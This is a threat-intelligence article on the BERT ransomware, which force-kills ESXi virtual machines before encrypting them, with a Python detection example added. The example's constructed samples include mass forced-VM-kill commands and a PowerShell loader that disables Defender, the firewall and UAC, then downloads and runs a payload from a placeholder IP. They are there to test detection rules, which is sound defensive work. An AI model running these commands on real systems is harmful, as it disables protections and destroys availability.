BERT Ransomware Forcibly Shut Down ESXi Virtual Machines to Disrupt Recovery
New ransomware group employs advanced virtualization attack tactics to maximize damage and hinder organizational recovery efforts.
A newly emerged ransomware group known as BERT has introduced a particularly disruptive capability that sets it apart from traditional ransomware operations: the ability to forcibly terminate ESXi virtual machines before encryption, significantly complicating recovery efforts for targeted organizations.
First observed in April 2025, BERT (tracked by Trend Micro as Water Pombero) has quickly established itself as a serious threat to virtualized environments across Asia, Europe, and the United States.
Advanced Virtual Machine Targeting
The ransomware’s most consequential feature is in its Linux variant, which detects the virtual machines running on an ESXi host and forcibly powers them off before it starts encrypting files.
Stopping the guests serves two ends. A powered-on VM holds locks on its disk files, so killing it is what lets the encryptor open and overwrite the VMDKs; and a host whose guests are all down gives administrators no window in which to migrate workloads elsewhere or take a final backup.
The malware uses the host’s own command-line tooling to terminate every running VM process, maximizing operational disruption.

Figure: Diagram of VMware vSphere architecture showing clients, vCenter Server, application and infrastructure services, and physical enterprise servers, network, and storage virtualization.
BERT’s Linux implementation supports up to 50 concurrent threads for rapid encryption, allowing the ransomware to process large virtualized environments efficiently.
When executed without command-line parameters, the malware defaults to shutting down the virtual machines with the host’s built-in ESXi command-line utilities. That is ordinary VMware administrative tooling rather than an exploit, so the operator needs only an account with administrative rights on the host; it also means the resulting VM power-off activity appears in the host’s own logs and can be monitored for.
The ransomware group has developed variants targeting Windows, Linux, and ESXi platforms simultaneously, enabling comprehensive attacks across hybrid IT environments.
On Windows systems, BERT employs PowerShell-based loaders that disable security features including Windows Defender, firewalls, and User Account Control before downloading the main payload from Russian infrastructure.

The group’s targeting strategy focuses primarily on healthcare, technology, and event services sectors, with confirmed victims spanning multiple continents.
Security researchers have identified overlaps between BERT’s codebase and the previously leaked REvil Linux variant, suggesting the group built on existing ransomware code rather than writing its own.
The forced-shutdown capability is a meaningful escalation because it attacks the recovery window rather than only the data.
Recovery plans often assume that administrators can live-migrate workloads to another host or take a final snapshot while an incident unfolds; terminating every VM on the host closes that window, and encrypting the datastore afterwards leaves nothing to restart locally. Offline or immutable backups held outside the compromised vSphere environment remain the recovery path.
Organizations running VMware ESXi face particular risk: a single compromised hypervisor exposes every virtual machine on it at once, and ESXi hosts typically run without the endpoint detection agents that would flag the same activity on a Windows or Linux server.
The ransomware appends different file extensions depending on the target platform: “.encryptedbybert” on Windows systems and “.encrypted_by_bert” on Linux and ESXi environments.
Mitigations
Cybersecurity experts recommend enhanced monitoring for PowerShell abuse and unauthorized script execution, with particular attention to loaders that disable Defender, the host firewall, or UAC before fetching a payload.
Organizations should also segment ESXi and vCenter management interfaces onto a restricted network, disable the ESXi Shell and SSH when they are not in active use and enable lockdown mode so hosts are managed only through vCenter, require MFA on vSphere administrative accounts, and maintain backups that include offline and immutable copies held outside the vSphere environment.
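The ESXi mass power-off described earlier and the PowerShell loader monitoring recommended here can both be turned into simple detections. The Python below is an added example written for this article, not code from the page, from Trend Micro, or from BERT. It makes several assumptions: the ESXi log lines follow the layout of /var/log/shell.log, which records commands entered in the ESXi Shell or over SSH (a binary that calls esxcli directly would have to be caught in the hostd or vmkernel logs instead); the threshold of three forced kills within sixty seconds is illustrative; and the PowerShell commands are generic ways of disabling Defender, the firewall and UAC, not BERT’s actual script. All log text is constructed for the example.

```python
"""Added detection example (not from the article, Trend Micro, or BERT itself).

Two checks for the behaviours the article describes:
  1. a burst of forced VM kills on an ESXi host, read from /var/log/shell.log
     (assumes the kills were issued in the ESXi Shell or over SSH, which is
     what shell.log records; the exact log layout is approximated);
  2. security-tool tampering in a PowerShell script block, as surfaced by
     ScriptBlock logging (Event ID 4104).
All log text below is constructed for the example, not captured from an incident.
"""
import re
from datetime import datetime, timedelta

# --- 1. ESXi: forced VM kills -------------------------------------------------

# Constructed shell.log excerpt: five forced kills in two seconds, then an
# unrelated single "soft" kill hours later. The binary name is a placeholder.
ESXI_SHELL_LOG = """\
2025-04-12T02:14:03Z shell[2097158]: [root]: esxcli vm process list
2025-04-12T02:14:05Z shell[2097158]: [root]: esxcli vm process kill --type=force --world-id=2099001
2025-04-12T02:14:05Z shell[2097158]: [root]: esxcli vm process kill --type=force --world-id=2099017
2025-04-12T02:14:06Z shell[2097158]: [root]: esxcli vm process kill --type=force --world-id=2099042
2025-04-12T02:14:06Z shell[2097158]: [root]: esxcli vm process kill --type=force --world-id=2099058
2025-04-12T02:14:07Z shell[2097158]: [root]: esxcli vm process kill --type=force --world-id=2099073
2025-04-12T02:14:09Z shell[2097158]: [root]: ./encryptor
2025-04-12T09:30:11Z shell[2097402]: [root]: esxcli vm process kill --type=soft --world-id=2099120
"""

SHELL_LINE = re.compile(r"^(?P<ts>\S+)\s+shell\[\d+\]:\s+\[(?P<user>[^\]]+)\]:\s+(?P<cmd>.*)$")
KILL_CMD = re.compile(r"\besxcli\s+vm\s+process\s+kill\b")
WORLD_ID = re.compile(r"--world-id=(\d+)")


def parse_esxi_shell_log(text):
    """Return (timestamp, user, command) tuples for every well-formed line."""
    events = []
    for line in text.splitlines():
        m = SHELL_LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append((ts, m["user"], m["cmd"]))
    return events


def detect_vm_kill_burst(events, threshold=3, window=timedelta(seconds=60)):
    """Alert on >= threshold forced kills whose timestamps fall within `window`
    of the first kill in the group. One forced kill is routine admin work; a
    rapid run of them against distinct world IDs is the mass power-off the
    article describes. Events must be in log (chronological) order."""
    kills = []
    for ts, user, cmd in events:
        if KILL_CMD.search(cmd) and "--type=force" in cmd:
            wid = WORLD_ID.search(cmd)
            kills.append((ts, user, wid.group(1) if wid else None))
    alerts, i = [], 0
    while i < len(kills):
        j = i
        while j + 1 < len(kills) and kills[j + 1][0] - kills[i][0] <= window:
            j += 1
        group = kills[i:j + 1]
        if len(group) >= threshold:
            alerts.append({"first": group[0][0], "last": group[-1][0],
                           "user": group[0][1], "world_ids": [k[2] for k in group]})
        i = j + 1
    return alerts


# --- 2. Windows: PowerShell loader disabling defences -------------------------

# Constructed script-block text. These are generic commands for the actions the
# article attributes to the loader (Defender, firewall, UAC off, then download);
# they are not BERT's script, and 203.0.113.10 is a documentation-range placeholder.
POWERSHELL_BLOCKS = {
    "loader": r"""
Set-MpPreference -DisableRealtimeMonitoring $true
netsh advfirewall set allprofiles state off
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name EnableLUA -Value 0
Invoke-WebRequest -Uri http://203.0.113.10/payload.exe -OutFile $env:TEMP\payload.exe
Start-Process $env:TEMP\payload.exe
""",
    "benign_audit": r"""
Get-MpComputerStatus | Select-Object AntivirusEnabled, RealTimeProtectionEnabled
Get-NetFirewallProfile | Format-Table Name, Enabled
""",
}

TAMPER_RULES = {
    "defender_disabled": re.compile(r"Set-MpPreference\b.*-Disable\w+\s+\$?true", re.I),
    "firewall_disabled": re.compile(
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off|Set-NetFirewallProfile\b.*-Enabled\s+False", re.I),
    "uac_disabled": re.compile(r"EnableLUA\b.*(?:-Value|/d)\s+0\b", re.I),
    "payload_download": re.compile(r"(?:Invoke-WebRequest|iwr|Start-BitsTransfer|DownloadFile)\b.*https?://", re.I),
}


def classify_script_block(text):
    """Return the sorted names of tamper rules the script block matches.
    A defender/firewall/uac hit together with a download is the loader
    pattern worth paging on; an empty list means nothing matched."""
    return sorted(name for name, rx in TAMPER_RULES.items() if rx.search(text))


if __name__ == "__main__":
    for a in detect_vm_kill_burst(parse_esxi_shell_log(ESXI_SHELL_LOG)):
        print(f"ESXi: {len(a['world_ids'])} forced VM kills by {a['user']} "
              f"between {a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}: {a['world_ids']}")
    for name, block in POWERSHELL_BLOCKS.items():
        print(f"PowerShell[{name}]: {classify_script_block(block) or 'clean'}")
```

Run it directly to print the alerts; in a SIEM the same two rules become a threshold search over the ESXi syslog feed and a regex over Event ID 4104 script-block text. The kill detector groups kills by distance from the first kill in the group rather than using a true sliding window, which is enough for a five-kills-in-two-seconds burst but will split a slow, paced kill sequence into separate groups; lower the threshold or widen the window for hosts that run only a handful of VMs.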
The emergence of BERT underscores the evolving sophistication of ransomware operations and their increasing focus on virtualized infrastructure.
As organizations continue to consolidate workloads onto virtualization platforms, the potential impact of such targeted attacks will only grow, making proactive defense measures more critical than ever.